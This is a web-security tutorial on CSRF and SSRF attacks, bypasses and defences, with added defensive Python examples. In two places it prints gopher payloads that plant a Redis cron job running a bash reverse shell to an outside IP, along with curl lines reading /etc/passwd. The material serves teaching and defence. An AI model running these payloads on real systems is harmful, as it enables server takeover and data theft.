2025-04-02 Update From: SLTechnology News&Howtos (shulou), Internet Technology
Shulou(Shulou.com)06/01 Report--
This article explains the CSRF and SSRF vulnerability classes met in web security penetration testing: how each one works, how it is exploited and how filters are bypassed, and how to defend against it.
3.3. CSRF vulnerability
3.3.1. Brief introduction
CSRF (Cross-Site Request Forgery), also known as "One Click Attack" or Session Riding, is a malicious exploitation of a website. Although it sounds like cross-site scripting (XSS), it is very different: XSS exploits the user's trust in the site (the site's own pages end up running attacker script), whereas CSRF exploits the site's trust in the user's browser. The browser attaches the user's cookies to a request regardless of which page triggered it, so a request forged by the attacker arrives at the site looking exactly like one the trusted user made.
3.3.2. Classification
3.3.2.1. Resource inclusion
The resource-inclusion type is the one shown in most demonstrations and introductory courses on CSRF. It boils down to the attacker controlling the URL loaded by an HTML tag that references a remote resource (for example <img>, <script>, <iframe> and so on). Any tag that loads a remote resource can complete the attack if the attacker can influence the URL it loads.
Because the browser attaches cookies to a request without checking which site initiated it (unless the cookie's SameSite attribute forbids it), this attack needs no XSS: it can be launched from any attacker-controlled site, or from the target site itself. It is limited to GET requests, because GET is the only method browsers use to fetch resource URLs. Its main limitation is therefore that the target must misuse a safe HTTP method, that is, perform a state-changing action in response to a GET.
3.3.2.2. Form-based
This type is usually seen where the application uses the safe request methods correctly (state changes only on POST). The attacker creates a form that submits the request the victim would otherwise have to make, together with a JavaScript fragment that forces the victim's browser to submit it automatically.
The form can be built entirely from hidden elements, so the victim sees nothing to notice.
If cookies are not handled properly (no SameSite restriction, no anti-CSRF token), the attacker can host the form on any site, and the attack succeeds as long as the victim is logged in with a valid cookie. If the forged request is one that redirects afterwards, a successful attack returns the victim to their normal page, so nothing looks wrong. This method is particularly effective in phishing, where the attacker can steer the victim to a specific page.
3.3.2.3. XMLHttpRequest
This is probably the least common form.
Because many modern web applications rely on XHR for their state-changing calls, their CSRF countermeasures are often built specifically around it (for example, requiring a custom request header that a plain HTML form cannot set).
Because of the same-origin policy (SOP), a cross-origin XHR that is not a "simple" request is preflighted, and the browser will not send it unless the target's cross-origin resource sharing (CORS) policy allows the attacker's origin. Without such a CORS misconfiguration, XHR-based CSRF therefore usually appears as an XSS payload: the attacker hosts the payload in a page of the victim origin, where script can issue any request the page itself could. (A cross-origin XHR that does qualify as a simple request, such as a form-encoded POST sent with credentials, goes out with cookies attached and is no different from the form-based case.)
The attack payload for this type is essentially a standard XHR; the attacker's work lies in finding a way to inject it into the DOM of a page in the victim's browser.
3.3.3. Defense
● Verify user submissions with a CSRF token (bound to the session) or a CAPTCHA
● Verify the Origin/Referer headers and, for JSON APIs, require a Content-Type that a plain HTML form cannot send
● Use POST (never GET) for operations that modify or delete user data
● Avoid a site-wide cookie: set the cookie's Domain and Path narrowly and set its SameSite attribute
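The first two defences, as an added example that is not code from the original article: a session-bound HMAC token (the attacker's page can neither read the victim's token nor forge one without the server secret), an Origin/Referer check, and a gate that refuses state changes on safe methods. The function names and the site origin "https://app.example" are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not code from the original article. The function names and the
# site origin "https://app.example" used below are assumptions.

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def make_csrf_token(secret: bytes, session_id: str) -> str:
    """Issue a token bound to one session: <nonce>.<HMAC(secret, session_id:nonce)>.

    The attacker's page cannot compute the MAC without the server secret and
    cannot read a token issued to the victim (same-origin policy), so a forged
    form or XHR cannot carry a valid value.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(secret: bytes, session_id: str, token: str) -> bool:
    """Recompute the MAC for the current session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected.encode(), mac.encode())


def origin_allowed(headers: dict, site_origin: str) -> bool:
    """Origin must equal our own origin; fall back to Referer; reject when neither is present.

    Browsers add Origin to cross-origin POSTs and XHRs ("null" from sandboxed or
    file:// pages), and a page on the attacker's site cannot change it.
    """
    origin = headers.get("Origin")
    if origin is not None:
        return origin == site_origin
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}" == site_origin
    return False


def request_allowed(method: str, headers: dict, form: dict,
                    session_id: str, secret: bytes, site_origin: str) -> bool:
    """Gate for a state-changing endpoint: safe methods pass because the handler
    must never perform writes for them (the resource-inclusion CSRF class);
    every other method needs a matching origin AND a valid session-bound token."""
    if method.upper() in SAFE_METHODS:
        return True
    if not origin_allowed(headers, site_origin):
        return False
    return verify_csrf_token(secret, session_id, form.get("csrf_token", ""))


if __name__ == "__main__":
    secret = secrets.token_bytes(32)
    token = make_csrf_token(secret, "sess-123")
    genuine = {"Origin": "https://app.example"}
    forged = {"Origin": "https://evil.example"}
    print(request_allowed("POST", genuine, {"csrf_token": token}, "sess-123", secret, "https://app.example"))  # True
    print(request_allowed("POST", forged, {"csrf_token": token}, "sess-123", secret, "https://app.example"))   # False
    print(request_allowed("POST", genuine, {}, "sess-123", secret, "https://app.example"))                    # False
```

The token is embedded in the form as a hidden field (or sent in a custom header by XHR); because it is derived from the session id, a token stolen from one session is useless in another, and the constant-time compare avoids leaking the MAC byte by byte.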
3.4. SSRF vulnerability
3.4.1. Brief introduction
Server-Side Request Forgery (SSRF) is an attack in which the attacker, without having gained control of the server, abuses a server-side feature that fetches URLs so that the server itself sends a crafted request, typically into the internal network it sits on. SSRF attacks usually target internal systems that cannot be reached directly from the outside.
3.4.2. Impact
SSRF can be used to scan ports on the external network, on the intranet where the server sits, and on the server itself; to attack applications running on the intranet or locally; and to read local files through the file:// protocol.
Internal services are generally defended more weakly than external ones, and some internal services perform no authentication at all for intranet access, for the convenience of operations and maintenance. When an SSRF exists, the damage is therefore usually severe.
3.4.3. Exploitation methods
SSRF can be exploited in many forms and scenarios, and each scenario has its own bypass methods.
Taking curl as the fetching library as an example: the dict:// protocol can drive Redis, file:// reads local files, and gopher:// can deliver a reverse shell (the payload below writes a cron job into Redis's dump file). Common payloads:
curl -vvv 'dict://127.0.0.1:6379/info'
curl -vvv 'file:///etc/passwd'
# Note: the URLs are single-quoted so the shell does not expand $8, $3 and so on as variables
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'
3.4.4. Related dangerous functions
The dangerous functions behind SSRF are mainly those that perform network access and also accept wrappers (pseudo-protocols) such as file://, dict:// and gopher://. In PHP, for example, they include file_get_contents(), fsockopen(), curl_exec() and so on.
3.4.5. Filter bypass
3.4.5.1. Change the way IP addresses are written
Some developers filter out private-network IPs by matching the passed URL parameter against regular expressions such as:
● ^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d\d?)){3}$
● ^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d\d?)){2}$
● ^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d\d?)){2}$
These only match the canonical dotted-decimal spelling, so the filter can be bypassed by rewriting the IP address. For example, 192.168.0.1 can be written as:
● octal format: 0300.0250.0.1
● hexadecimal format: 0xC0.0xA8.0.1
● decimal integer format: 3232235521
● hexadecimal integer format: 0xC0A80001
There is also an abbreviated form: 10.0.0.1 can be written as 10.1, because the last number fills all the remaining bytes. When the rewritten address is used, Apache reports 400 Bad Request, but other services such as Nginx, MySQL and so on still work normally. In addition, 0.0.0.0 reaches the local machine directly and is usually missed by regex filtering.
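Where those spellings come from, and how to filter them properly, as an added example that is not code from the original article: inet_aton_loose replicates the parsing rules of inet_aton(3), which curl, PHP and most other clients use for IPv4 literals, so the filter sees the same address the client will connect to; the page's three regexes are included to show that they match none of the rewritten forms. The function names are assumptions made for this example; the IPv6 loopback and IPv4-mapped cases that the IPv6 section below describes are handled as well.

```python
import ipaddress
import re

# Added example, not code from the original article. Function names are assumptions.

# The three private-range regexes from the text, combined. They only match the
# canonical dotted-decimal spelling, which is exactly the weakness.
NAIVE_PRIVATE_RE = re.compile(
    r"^(?:10(?:\.(?:25[0-5]|2[0-4]\d|[01]?\d\d?)){3}"
    r"|172\.(?:1[6-9]|2\d|3[01])(?:\.(?:25[0-5]|2[0-4]\d|[01]?\d\d?)){2}"
    r"|192\.168(?:\.(?:25[0-5]|2[0-4]\d|[01]?\d\d?)){2})$"
)


def naive_is_private(host: str) -> bool:
    return NAIVE_PRIVATE_RE.match(host) is not None


def _part_to_int(part: str) -> int:
    """Numeric rules of inet_aton(3): 0x prefix = hex, leading 0 = octal, else decimal."""
    if not (part.isascii() and part.isalnum()):
        raise ValueError(part)  # rejects empty parts, signs, spaces, underscores, non-ASCII digits
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_loose(text: str):
    """Return the 32-bit value inet_aton(3) produces for text, or None if text is
    not an IPv4 literal in any accepted spelling. With fewer than four parts the
    last part fills the remaining bytes: 10.1 -> 10.0.0.1, 3232235521 -> 192.168.0.1."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_part_to_int(p) for p in parts]
    except ValueError:
        return None
    *lead, last = nums
    if any(n > 255 for n in lead):
        return None
    remaining_bits = 8 * (4 - len(lead))
    if last >= 1 << remaining_bits:
        return None
    value = 0
    for n in lead:
        value = (value << 8) | n
    return (value << remaining_bits) | last


def normalize_ipv4(text: str):
    """Canonical dotted-decimal spelling, or None."""
    value = inet_aton_loose(text)
    return None if value is None else str(ipaddress.IPv4Address(value))


def is_internal_target(host: str):
    """Strict check: canonicalise first, then classify with the ipaddress module.
    Returns True/False for IP literals and None for hostnames, which must be
    resolved and their resolved address checked the same way."""
    host = host.strip("[]")  # IPv6 literals appear bracketed in URLs
    canonical = normalize_ipv4(host)
    try:
        ip = ipaddress.ip_address(canonical if canonical is not None else host)
    except ValueError:
        return None
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:192.168.0.1 is really an IPv4 target
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


if __name__ == "__main__":
    for spelling in ["192.168.0.1", "0300.0250.0.1", "0xC0.0xA8.0.1", "3232235521",
                     "0xC0A80001", "10.1", "0.0.0.0", "[::1]", "::ffff:127.0.0.1"]:
        print(f"{spelling:20} regex={naive_is_private(spelling)!s:5} "
              f"canonical={normalize_ipv4(spelling)} internal={is_internal_target(spelling)}")
```

The point of the design is that the allow/deny decision is taken on the canonical address, never on the string the user typed; a hostname result (None) is not a pass, it means the name has to be resolved and the resolved address put through the same check.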
3.4.5.2. Use domain names that resolve to the intranet
If the server filters the literal host string without resolving it first, a domain name that resolves to an internal address (any public name the attacker controls, or an existing name that points at 127.0.0.1 or a private range) passes the filter while the request still lands on the intranet.
3.4.5.3. Exploiting URL parsing problems
In some cases the back-end program parses the requested URL and filters the host it extracts. If the parsing is done improperly, the extracted host is not the one the request actually goes to, and the filter can be bypassed.
For example, with a URL of the form http://www.baidu.com@192.168.0.1/ (the part before @ is the userinfo, not the host), a back-end that extracts the host with a careless regular expression (for instance everything between "http://" and "com", i.e. www.baidu.com) will conclude that the request goes to www.baidu.com. In fact everything this URL requests is served by 192.168.0.1.
3.4.5.4. Using redirects
If the back-end server parses the host of the URL correctly and filters it before sending the request, a redirect can be used to bypass the check: the filtered URL points at a harmless host, which then redirects the server to the internal target.
A service such as http://httpbin.org/redirect-to?url=http://192.168.0.1 can be used for the redirect, but because that URL itself contains the intranet address 192.168.0.1 it may be caught by the regular expression; wrapping it in a URL shortener hides the address from the filter.
The commonly used redirects are 302 and 307. The difference is that on a 307 the client repeats the request with the same method and body, so a POST is forwarded as a POST, whereas on a 302 most clients switch to GET and drop the body.
3.4.5.5. Through various non-HTTP protocols
If the server-side program only checks the host of the URL and not the scheme, a non-HTTP protocol can be used.
For example, with gopher:// an arbitrary TCP payload, including a hand-built POST or GET request, can be placed in the URL parameter to attack applications on the private network. The following URL attacks a Redis service on the private network (it is the same cron reverse-shell payload as in 3.4.3, with a different listener address):
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
Besides gopher, the file:// protocol is also commonly used in SSRF. It reads files on the local machine through a URL of the form file:///path/to/file, and because no host is involved it sidesteps any filtering of the IP the server would access. For example, file:///d:/1.txt reads 1.txt on drive D: of a Windows host.
3.4.5.6. DNS Rebinding
A common defence goes like this: for the URL parameter supplied by the user, the server first resolves the hostname through DNS and then checks the IP address the DNS server returned; if it is on the blacklist, the request is refused.
However, there is a time gap between the first DNS lookup, made for the check, and the second lookup the server's HTTP client makes when it actually requests the URL. This gap is what a DNS rebinding attack exploits.
To carry out DNS rebinding we need a domain name whose resolution is delegated to a DNS server we control; on that server we write a resolver that answers differently on successive queries and set the TTL to 0 so that no answer is cached. The complete attack then proceeds as follows:
● The server takes the URL parameter and performs the first DNS lookup, obtaining a non-intranet IP.
● The server checks that IP, finds it is not blacklisted, and passes the request.
● The server fetches the URL. Because the TTL is 0, DNS resolution is performed again, and this time the DNS server returns a private-network address.
● The check has been bypassed, and the server returns the result of accessing the private-network resource.
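The flawed check-then-fetch flow beside the fix, as an added example that is not code from the original article: the safe version resolves once, validates the answer, connects to that exact address (keeping the hostname only in the Host header) and repeats the check on every redirect, which also covers 3.4.5.4; it uses a real URL parser, so the http://www.baidu.com@192.168.0.1/ trick from 3.4.5.3 yields the true host. The DNS resolver and HTTP transport are constructed stubs that stand in for the network; the hostnames under .example and the addresses 1.2.3.4 and 10.0.0.5 are placeholders, and all function names are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Added example, not code from the original article. The resolver and transport
# are constructed stubs; hostnames, addresses and function names are assumptions.

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_internal(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified


def naive_fetch(url: str, resolve, transport) -> str:
    """Check-then-fetch as described in the text: one lookup for the filter, then
    the HTTP client performs its own lookup when it connects. Returns the
    address actually connected to."""
    host = urlsplit(url).hostname
    if is_internal(resolve(host)):
        raise ValueError(f"blocked: {host}")
    return transport(resolve(host), url)[2]     # second lookup: the rebinding window


def pinned_fetch(url: str, resolve, transport, max_redirects: int = 3) -> str:
    """Resolve once, validate the answer, connect to that exact address with the
    original hostname in the Host header, and re-validate on every redirect."""
    for _ in range(max_redirects + 1):
        host = urlsplit(url).hostname          # real parser: http://a.example@10.0.0.5/ -> 10.0.0.5
        if host is None:
            raise ValueError("no host in URL")
        ip = resolve(host)
        if is_internal(ip):
            raise ValueError(f"blocked: {host} -> {ip}")
        status, location, connected = transport(ip, url)
        if status in REDIRECT_STATUSES and location:
            url = location                     # next hop goes through the same check
            continue
        return connected
    raise ValueError("too many redirects")


class StubResolver:
    """Constructed DNS. A host with several answers returns them in order and then
    repeats the last one, which is what an attacker's TTL-0 zone looks like to a
    client that resolves twice. Unknown names are treated as IP literals."""
    def __init__(self, table: dict):
        self.table = {host: list(answers) for host, answers in table.items()}

    def __call__(self, host: str) -> str:
        answers = self.table.get(host)
        if answers is None:
            return host
        return answers.pop(0) if len(answers) > 1 else answers[0]


REDIRECTS = {"http://hop.example/go": "http://10.0.0.5/admin"}   # constructed open redirector


def stub_transport(ip: str, url: str):
    """Pretend to connect to ip and request url; return (status, location, connected_ip)."""
    if url in REDIRECTS:
        return 302, REDIRECTS[url], ip
    return 200, None, ip


def demo() -> dict:
    def rebinding():
        return StubResolver({"evil.example": ["1.2.3.4", "10.0.0.5"]})
    results = {
        "naive": naive_fetch("http://evil.example/", rebinding(), stub_transport),
        "pinned": pinned_fetch("http://evil.example/", rebinding(), stub_transport),
    }
    try:
        pinned_fetch("http://hop.example/go", StubResolver({"hop.example": ["1.2.3.4"]}), stub_transport)
        results["redirect"] = "followed"
    except ValueError as err:
        results["redirect"] = str(err)
    return results


if __name__ == "__main__":
    print(demo())
```

With a real client the pinning is done by connecting to the validated IP and sending the original hostname in the Host header (and in SNI for TLS), or by installing a resolver hook so the library cannot look the name up again; disabling automatic redirects and walking them in the loop above is what keeps the redirect bypass out.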
3.4.5.7. Using IPv6
Some services do not take IPv6 into account while the private network does support it, so the IPv6 loopback address, such as [::1] (or its IPv4-mapped form, [::ffff:127.0.0.1]), or an intranet hostname with an IPv6 record can be used to bypass the filter.
3.4.5.8. Using IDN
Some network access tools, such as curl, support internationalized domain names (IDN): domain names composed partly or entirely of non-ASCII characters.
Some of these characters are mapped to their ASCII equivalents before the name is resolved; for example ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ becomes example.com. In the same way, the circled digits ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ can spell an internal IP address that a filter looking for ASCII digits never sees.
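The mapping behind that bypass, as an added example that is not code from the original article: the NFKC normalization that IDN processing applies turns ⓔ into e and ① into 1, so a filter must apply the same canonicalisation before comparing against its blocklist. The circled() helper only spells ASCII with the circled code points, the blocklist is a constructed sample, and the function names are assumptions.

```python
import unicodedata

# Added example, not code from the original article. The blocklist is a constructed
# sample and the helper names are assumptions.

BLOCKLIST = ("localhost", "127.0.0.1", "169.254.169.254")


def circled(text: str) -> str:
    """Spell ASCII letters and digits with the Unicode circled forms from the text."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr(0x24D0 + ord(ch) - ord("a")))   # U+24D0..U+24E9, circled a..z
        elif "1" <= ch <= "9":
            out.append(chr(0x2460 + ord(ch) - ord("1")))   # U+2460..U+2468, circled 1..9
        elif ch == "0":
            out.append("\u24EA")                            # circled digit zero
        else:
            out.append(ch)
    return "".join(out)


def canonical_host(host: str) -> str:
    """The name the resolver will actually look up: NFKC-folded, lower-cased,
    trailing dot removed, then IDNA-encoded (punycode for anything still non-ASCII)."""
    folded = unicodedata.normalize("NFKC", host).lower().rstrip(".")
    return folded.encode("idna").decode("ascii")


def naive_blocked(host: str) -> bool:
    """Compares the raw string: the circled spelling is not in the list."""
    return host.lower() in BLOCKLIST


def strict_blocked(host: str) -> bool:
    """Compares the canonical name, i.e. what curl will resolve."""
    return canonical_host(host) in BLOCKLIST


if __name__ == "__main__":
    for raw in (circled("localhost"), circled("169.254.169.254"), "Example.COM."):
        print(f"{raw!r}: naive={naive_blocked(raw)} strict={strict_blocked(raw)} -> {canonical_host(raw)}")
```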
3.4.6. Possible exploitation targets
● ftp, ftps (brute-forcing FTP credentials)
● sftp
● tftp (UDP protocol extension)
● dict
● gopher
● ldap
● imap/imaps/pop3/pop3s/smtp/smtps (brute-forcing mail usernames and passwords)
● rtsp, smb/smbs (connecting to SMB shares)
● telnet
● http 、 https
● mongodb
● ShellShock command execution
● JBoss remote invoker WAR deployment, command execution
● Java debug interface command execution
● Axis2 admin console service deployment, command execution
● Jenkins script console command execution
● Confluence SSRF
● Struts2 command execution
● CouchDB web API remote command execution
● Docker API remote command execution
● php-fpm/FastCGI command execution
● Tomcat command execution
● Elasticsearch Groovy script command execution
● WebDAV PUT arbitrary file upload
● WebSphere admin console WAR deployment, indirect command execution
● Apache Hadoop remote command execution
● ZenTao PMS remote command execution
● HFS remote command execution
● GlassFish arbitrary file read and WAR deployment, indirect command execution
3.4.7. Defence
● Filter the information returned to the user (never echo the fetched response raw)
● Use a uniform error message, so that the attacker cannot tell open ports from closed ones or existing hosts from missing ones
● Restrict the ports that may be requested
● Disable protocols that are not needed (gopher, dict, file and so on)
● Against DNS rebinding, resolve once and connect to the checked address (or use a DNS cache), or use a host whitelist
That concludes this overview of CSRF and SSRF vulnerabilities in web security penetration testing; the techniques above still need to be verified in practice before being relied upon.